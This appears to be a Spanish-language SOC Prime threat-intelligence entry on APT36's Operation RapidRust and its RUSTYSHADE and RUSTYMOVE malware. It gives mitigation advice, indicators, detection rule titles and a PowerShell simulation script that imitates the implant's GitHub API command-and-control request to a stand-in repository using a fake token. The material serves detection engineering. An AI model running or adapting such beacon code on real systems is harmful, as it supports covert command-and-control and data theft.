SOC Prime Bias: Critical

17 Sep 2026 20:33 UTC

APT36 Lanza la Operación RapidRust con RUSTYSHADE y RUSTYMOVE

Author Photo
SOC Prime Team linkedin icon Seguir
APT36 Lanza la Operación RapidRust con RUSTYSHADE y RUSTYMOVE
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El actor de amenaza vinculado a Pakistán APT36 está llevando a cabo una campaña denominada Operación RapidRust contra organizaciones gubernamentales y de defensa. El grupo ha introducido nuevo malware basado en Rust, incluyendo la puerta trasera RUSTYSHADE y la herramienta de propagación RUSTYMOVE. APT36 también utiliza scripts especializados para el robo de archivos, PSNATCH y BASHNATCH, para recopilar y exfiltrar datos a través de repositorios privados de GitHub.

Investigación

Zscaler ThreatLabz identificó nuevas familias de malware y herramientas post-compromiso utilizadas por APT36 en agosto de 2026. La investigación reveló que RUSTYSHADE abusa de la API REST de GitHub para comando y control y utiliza dominios con errores tipográficos para la puesta en escena de cargas útiles. Los investigadores también observaron intentos de movimiento lateral y la propagación de RUSTYMOVE a través de medios removibles para alcanzar entornos aislados.

Mitigación

Las organizaciones deben monitorear el uso no autorizado de la API de GitHub y conexiones salientes inusuales a servicios de almacenamiento en la nube como Backblaze. Se deben aplicar controles estrictos en medios removibles, mientras que deben detectarse tareas programadas sospechosas que se hagan pasar por actualizaciones legítimas. El monitoreo de endpoints también debería identificar la ejecución no autorizada de scripts de PowerShell o Bash y actividad inusual de exfiltración de archivos.

Respuesta

Si se detecta actividad maliciosa, se deben aislar inmediatamente los endpoints afectados en Windows y Linux para prevenir el movimiento lateral y la exfiltración de datos. Los respondedores deben inspeccionar tareas programadas y buscar archivos como DriverInstaller.zip or Automata-20.exe. Los registros de red también deben revisarse para detectar conexiones a theprints[.]org, indiatodays[.]org, y actividad sospechosa de la API de GitHub que se origine en el entorno.

Flujo de ataque

Todavía estamos actualizando esta parte.

Detecciones

Posibilidad de Ejecución a través de Líneas de Comando de PowerShell Ocultas (vía cmdline)

Equipo SOC Prime
17 Sep 2026

Descarga o Carga a través de Powershell (vía cmdline)

Equipo SOC Prime
17 Sep 2026

Posible Descubrimiento de Sistemas Remotos o Verificación de Conectividad (vía cmdline)

Equipo SOC Prime
17 Sep 2026

Posible Descubrimiento de Recursos Compartidos de Red (vía cmdline)

Equipo SOC Prime
17 Sep 2026

Posible Enumeración de Cuentas de Admin o Grupos (vía cmdline)

Equipo SOC Prime
17 Sep 2026

Posible Descubrimiento de la Configuración de Red del Sistema (vía cmdline)

Equipo SOC Prime
17 Sep 2026

Ejecución Sospechosa desde el Perfil de Usuario Público (vía process_creation)

Equipo SOC Prime
17 Sep 2026

Posible Creación de Tarea Programada (vía powershell)

Equipo SOC Prime
17 Sep 2026

Posible Intento de Comunicaciones de Consulta de Dominio IP (vía dns)

Equipo SOC Prime
17 Sep 2026

IOCs (HashSha256) para detectar: Operación RapidRust: APT36 Despliega RUSTYSHADE, RUSTYMOVE, PSNATCH, y BASHNATCH

Reglas de AI de SOC Prime
17 Sep 2026

IOCs (HashSha1) para detectar: Operación RapidRust: APT36 Despliega RUSTYSHADE, RUSTYMOVE, PSNATCH, y BASHNATCH

Reglas de AI de SOC Prime
17 Sep 2026

IOCs (HashMd5) para detectar: Operación RapidRust: APT36 Despliega RUSTYSHADE, RUSTYMOVE, PSNATCH, y BASHNATCH

Reglas de AI de SOC Prime
17 Sep 2026

Comunicación C2 de RUSTYSHADE a través de la API de GitHub [Conexión de Red de Windows]

Reglas de AI de SOC Prime
17 Sep 2026

Detección de Actividad de RUSTYSHADE y RUSTYMOVE a través de PowerShell [Windows Powershell]

Reglas de AI de SOC Prime
17 Sep 2026

Ejecución de Simulación

  • Narrativa del Ataque y Comandos: El adversario ha desplegado con éxito un implante similar a RUSTYSHADE en una estación de trabajo de Windows. Para recibir instrucciones adicionales, el implante debe comunicarse con su C2 alojado en GitHub. El implante intentará alcanzar un repositorio específico para obtener una carga útil. Para evitar filtros perimetrales básicos que podrían bloquear el acceso anónimo a la API, el implante utiliza un Token de Acceso Personal (PAT) codificado que se pasa a través del Authorization: token <TOKEN> encabezado. Esta acción está destinada a parecerse a una herramienta legítima de desarrollo que obtiene metadatos de repositorio, pero la combinación específica del URL del repositorio y el token prefijo en el encabezado activará la regla de detección.

  • Script de Prueba de Regresión:

    # Script de simulación para imitar la comunicación C2 de RUSTYSHADE
    # Este script genera una solicitud que coincide con la lógica de detección:
    # 1. La URL contiene 'api.github.com/repos/'
    # 2. El encabezado contiene 'Authorization: token'
    
    $targetUrl = "https://api.github.com/repos/adversary-c2/malicious-repo/contents/config.json"
    $fakeToken = "ghp_sImUlAtEdToKeN1234567890AbCdEfGhIjKlMnOpQrStUvWxYz"
    
    # Construyendo el encabezado para coincidir con la cadena exacta 'token' requerida por la regla
    $headers = @{
        "Authorization" = "token $fakeToken"
        "User-Agent"    = "RUSTYSHADE-Implant/1.0"
    }
    
    Write-Host "Intentando comunicación C2 a $targetUrl..."
    try {
        # Usamos -ErrorAction SilentlyContinue porque la URL es falsa y devolverá 404, 
        # pero el proxy aún registrará el intento de solicitud.
        Invoke-WebRequest -Uri $targetUrl -Headers $headers -Method Get -ErrorAction SilentlyContinue
        Write-Host "Solicitud de simulación enviada con éxito."
    } catch {
        Write-Host "Solicitud enviada (Error esperado debido a URL falsa, pero los registros del proxy deben capturar el intento)."
    }
  • Comandos de Limpieza:

    # No se realizaron cambios persistentes en el sistema; 
    # sin embargo, borramos el historial de comandos por limpieza.
    Clear-History